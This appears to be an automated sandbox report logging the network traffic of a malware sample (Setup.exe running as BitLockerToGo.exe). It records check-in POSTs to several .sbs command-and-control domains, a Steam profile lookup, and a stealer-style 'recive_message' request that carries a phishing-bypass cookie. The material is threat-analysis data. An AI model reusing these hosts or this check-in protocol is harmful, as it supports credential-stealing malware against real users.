                                           Transfer-Encoding: chunked
                                           Connection: close
                                           Set-Cookie: PHPSESSID=etr7faknc8avg39cfckopqo8e4; expires=Wed, 05 Feb 2025 17:30:00 GMT; Max-Age=9999999; path=/
                                           Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                           Cache-Control: no-store, no-cache, must-revalidate
                                           Pragma: no-cache
                                           cf-cache-status: DYNAMIC
                                           vary: accept-encoding
                                           Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ABBajZ%2BnrvsWrqStFdN4GVgG5%2Fh5VSSm1BUdetrLHWykn4dWKOHEFM%2F0eFjLLHeAgcTrH6d6kP%2BLEDFGeQtXtEV8Kxb4C54QCHLkcihKT2n86wlGAkQBGyloXIINdt6V"}],"group":"cf-nel","max_age":604800}
                                           NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                           Server: cloudflare
                                           CF-RAY: 8d1af39e5f0f423d-EWR
                                           alt-svc: h3=":443"; ma=86400
2024-10-12 23:43:21 UTC  15     IN         Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                           Data Ascii: aerror #D12
2024-10-12 23:43:21 UTC  5      IN         Data Raw: 30 0d 0a 0d 0a
                                           Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.6  49790        104.21.77.78    443               3784  C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp                Bytes  Direction  Data
2024-10-12 23:43:22 UTC  260    OUT        POST /api HTTP/1.1
                                           Connection: Keep-Alive
                                           Content-Type: application/x-www-form-urlencoded
                                           User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                           Content-Length: 8
                                           Host: resinedyw.sbs
2024-10-12 23:43:22 UTC  8      OUT        Data Raw: 61 63 74 3d 6c 69 66 65
                                           Data Ascii: act=life
2024-10-12 23:43:22 UTC  821    IN         HTTP/1.1 200 OK
                                           Date: Sat, 12 Oct 2024 23:43:22 GMT
                                           Content-Type: text/html; charset=UTF-8
                                           Transfer-Encoding: chunked
                                           Connection: close
                                           Set-Cookie: PHPSESSID=9lbu4p8lpoo8jmaja27iuaueo6; expires=Wed, 05 Feb 2025 17:30:01 GMT; Max-Age=9999999; path=/
                                           Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                           Cache-Control: no-store, no-cache, must-revalidate
                                           Pragma: no-cache
                                           cf-cache-status: DYNAMIC
                                           vary: accept-encoding
                                           Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GILYeplkr%2Ffp9xXt8GsB2lq%2FcQ2TFd8Z2dFHOUG8rc9%2FI%2BqKX%2Fw1BUUxkVIsiF1bXnSItNIkP2HTKuX18McdOWMqfzOtvxPDcViXqjR7nsGc%2BfnL5Ya9ydlACc27JvnU"}],"group":"cf-nel","max_age":604800}
                                           NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                           Server: cloudflare
                                           CF-RAY: 8d1af3a4bdb3c3ff-EWR
                                           alt-svc: h3=":443"; ma=86400
2024-10-12 23:43:22 UTC  15     IN         Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                           Data Ascii: aerror #D12
2024-10-12 23:43:22 UTC  5      IN         Data Raw: 30 0d 0a 0d 0a
                                           Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.6  49799        172.67.140.193  443               3784  C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp                Bytes  Direction  Data
2024-10-12 23:43:23 UTC  261    OUT        POST /api HTTP/1.1
                                           Connection: Keep-Alive
                                           Content-Type: application/x-www-form-urlencoded
                                           User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                           Content-Length: 8
                                           Host: vennurviot.sbs
2024-10-12 23:43:23 UTC  8      OUT        Data Raw: 61 63 74 3d 6c 69 66 65
                                           Data Ascii: act=life
2024-10-12 23:43:23 UTC  825    IN         HTTP/1.1 200 OK
                                           Date: Sat, 12 Oct 2024 23:43:23 GMT
                                           Content-Type: text/html; charset=UTF-8
                                           Transfer-Encoding: chunked
                                           Connection: close
                                           Set-Cookie: PHPSESSID=hmvh15q522frff2ilt1g2m5bkl; expires=Wed, 05 Feb 2025 17:30:02 GMT; Max-Age=9999999; path=/
                                           Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                           Cache-Control: no-store, no-cache, must-revalidate
                                           Pragma: no-cache
                                           cf-cache-status: DYNAMIC
                                           vary: accept-encoding
                                           Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CsPzjr3kFO5za8X7bCtDlcYrZmxf%2ByAifNtlxKcYTWQw8RPxRe1Tka2A881G5O1d65IlHoot7vW%2B0wdl%2BNaLlT82N3HVamB8h0rBER%2BzQCcWVkBugasNMG65qpITOnSR3A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                           NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                           Server: cloudflare
                                           CF-RAY: 8d1af3aad96d9e02-EWR
                                           alt-svc: h3=":443"; ma=86400
2024-10-12 23:43:23 UTC  15     IN         Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                           Data Ascii: aerror #D12
2024-10-12 23:43:23 UTC  5      IN         Data Raw: 30 0d 0a 0d 0a
                                           Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.6  49806        172.67.173.224  443               3784  C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp                Bytes  Direction  Data
2024-10-12 23:43:24 UTC  262    OUT        POST /api HTTP/1.1
                                           Connection: Keep-Alive
                                           Content-Type: application/x-www-form-urlencoded
                                           User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                           Content-Length: 8
                                           Host: ehticsprocw.sbs
2024-10-12 23:43:24 UTC  8      OUT        Data Raw: 61 63 74 3d 6c 69 66 65
                                           Data Ascii: act=life
2024-10-12 23:43:24 UTC  817    IN         HTTP/1.1 200 OK
                                           Date: Sat, 12 Oct 2024 23:43:24 GMT
                                           Content-Type: text/html; charset=UTF-8
                                           Transfer-Encoding: chunked
                                           Connection: close
                                           Set-Cookie: PHPSESSID=0qcmi8n5bv4jbld1j9jt7kj096; expires=Wed, 05 Feb 2025 17:30:03 GMT; Max-Age=9999999; path=/
                                           Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                           Cache-Control: no-store, no-cache, must-revalidate
                                           Pragma: no-cache
                                           cf-cache-status: DYNAMIC
                                           vary: accept-encoding
                                           Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QAVfFbCi1TEnRXa8Vmwh5mFFPAOI0Z3aBTd%2BEA18hiRiT1o7x8z5XFENm69z8VxYdJWga8SFBHlA85YgCpeoqEQshoL6FxdzsMh9o0bn30adxwMbzD3WFbwj8SjNABndGWc%3D"}],"group":"cf-nel","max_age":604800}
                                           NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                           Server: cloudflare
                                           CF-RAY: 8d1af3b10e7441e3-EWR
                                           alt-svc: h3=":443"; ma=86400
2024-10-12 23:43:24 UTC  15     IN         Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                           Data Ascii: aerror #D12
2024-10-12 23:43:24 UTC  5      IN         Data Raw: 30 0d 0a 0d 0a
                                           Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.6  49813        104.21.79.35    443               3784  C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp                Bytes transferred  Direction  Data
2024-10-12 23:43:25 UTC  263                OUT        POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: condifendteu.sbs
2024-10-12 23:43:25 UTC  8                  OUT        Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-10-12 23:43:25 UTC  817                IN         HTTP/1.1 200 OK
    Date: Sat, 12 Oct 2024 23:43:25 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=1cn6gq7irau5vldv6iu3l8ppao; expires=Wed, 05 Feb 2025 17:30:04 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zIihhNuCvjr3JcQnwJRLyeQHck%2FpHeoxs8BUhWRdou8vScVKOjPVuJTX86fp6Sge9DUqyoHkQDK9DHUQF0Eg8yqWFc9sXqiFFIGKxhjC7Oyex86OMY9L%2B2tYrfybZWJK5H5e"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d1af3b72f405e7e-EWR
    alt-svc: h3=":443"; ma=86400
2024-10-12 23:43:25 UTC  15                 IN         Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
    Data Ascii: aerror #D12
2024-10-12 23:43:25 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
7           192.168.2.6  49819        188.114.96.3    443               3784  C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp                Bytes transferred  Direction  Data
2024-10-12 23:43:26 UTC  264                OUT        POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: drawwyobstacw.sbs
2024-10-12 23:43:26 UTC  8                  OUT        Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-10-12 23:43:27 UTC  833                IN         HTTP/1.1 200 OK
    Date: Sat, 12 Oct 2024 23:43:26 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=s17h8heelj9jurn39bo7jeonll; expires=Wed, 05 Feb 2025 17:30:05 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cYIXq3UBLtVDK1G%2F%2BXdaCcQHbkvQxSnk6x6k1X444FS74PSe1mnYkhvqEOduDRzEFY%2F%2BnO6uTilNkqcrvkyGT%2BsCmLSFbRgVfALR1pzW%2BuX7rJWOS8mFsI3pnKrESBSIs8NHOw%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d1af3bd583242d7-EWR
    alt-svc: h3=":443"; ma=86400
2024-10-12 23:43:27 UTC  15                 IN         Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
    Data Ascii: aerror #D12
2024-10-12 23:43:27 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
8           192.168.2.6  49826        104.102.49.254  443               3784  C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp                Bytes transferred  Direction  Data
2024-10-12 23:43:28 UTC  219                OUT        GET /profiles/76561199724331900 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: steamcommunity.com
2024-10-12 23:43:28 UTC  1870               IN         HTTP/1.1 200 OK
    Server: nginx
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-cache
    Date: Sat, 12 Oct 2024 23:43:28 GMT
    Content-Length: 34837
    Connection: close
    Set-Cookie: sessionid=635f6df559947daae0aecb1d; Path=/; Secure; SameSite=None
    Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-10-12 23:43:28 UTC  14514              IN         Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-12 23:43:28 UTC  16384              IN         Data Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f
    Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
2024-10-12 23:43:28 UTC  3768               IN         Data Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29
    Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
2024-10-12 23:43:28 UTC  171                IN         Data Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
    Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
9           192.168.2.6  49837        172.67.206.204  443               3784  C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp                Bytes transferred  Direction  Data
2024-10-12 23:43:29 UTC  264                OUT        POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: sergei-esenin.com
2024-10-12 23:43:29 UTC  8                  OUT        Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-10-12 23:43:29 UTC  553                IN         HTTP/1.1 200 OK
    Date: Sat, 12 Oct 2024 23:43:29 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Frame-Options: SAMEORIGIN
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iCn2fvvV57BsmNyTwNHjXv5vSkSM2gzBcx2WsUlphp%2FTOeHnPbNTTWwf5TdIj2avPJe9NC97qAeEQpmpW8WtvyqKsN1nRJqV0Q2h%2Fkod%2FV2HXl3cZVl0eAvGnJOF1OvuNNMsFg%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d1af3d0d9d48ce3-EWR
2024-10-12 23:43:29 UTC  816                IN         Data Raw: 31 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
    Data Ascii: 1151<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-10-12 23:43:29 UTC  1369               IN         Data Raw: 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f
    Data Ascii: s/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('co
2024-10-12 23:43:29 UTC  1369               IN         Data Raw: 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70
    Data Ascii: ement/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <inp
2024-10-12 23:43:29 UTC  887                IN         Data Raw: 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61
    Data Ascii: <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="bra
2024-10-12 23:43:29 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 10
Source IP: 192.168.2.6
Source Port: 49843
Destination IP: 172.67.206.204
Destination Port: 443
PID: 3784
Process: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp / Bytes transferred / Direction / Data
2024-10-12 23:43:30 UTC / 354 bytes / OUT / POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Cookie: __cf_mw_byp=bxMlIAxRNFAWJgPn4rB1sAax3Kr_T1ZtpPoatisDzkE-1728776609-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 46
Host: sergei-esenin.com
2024-10-12 23:43:30 UTC / 46 bytes / OUT / Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6b 39 39 65 52 43 2d 2d 64 61 76 69 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=k99eRC--davi&j=
2024-10-12 23:43:30 UTC / 831 bytes / IN / HTTP/1.1 200 OK
Date: Sat, 12 Oct 2024 23:43:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=i7frcgoggeujrsd1nnk47nne0r; expires=Wed, 05 Feb 2025 17:30:09 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i8ycBekjxDSHilxOawTvub3Lcsg1u797e2dslQH43Kmni7vMLMJWYMZ%2Bfp%2FWGR4C4KZRWyOI9%2FyXOQkqGXvddu%2BIUvhgO1W1PDbCt9z%2FSpHY4w8dKxXnRLKq4zKQx3gV8eqSTg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d1af3d71aa64411-EWR
alt-svc: h3=":443"; ma=86400
2024-10-12 23:43:30 UTC / 15 bytes / IN / Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
Data Ascii: aerror #D12
2024-10-12 23:43:30 UTC / 5 bytes / IN / Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                        Target ID:0
                                                                                                                                                        Start time:19:43:02
                                                                                                                                                        Start date:12/10/2024
                                                                                                                                                        Path:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Users\user\Desktop\Setup.exe"
                                                                                                                                                        Imagebase:0x570000
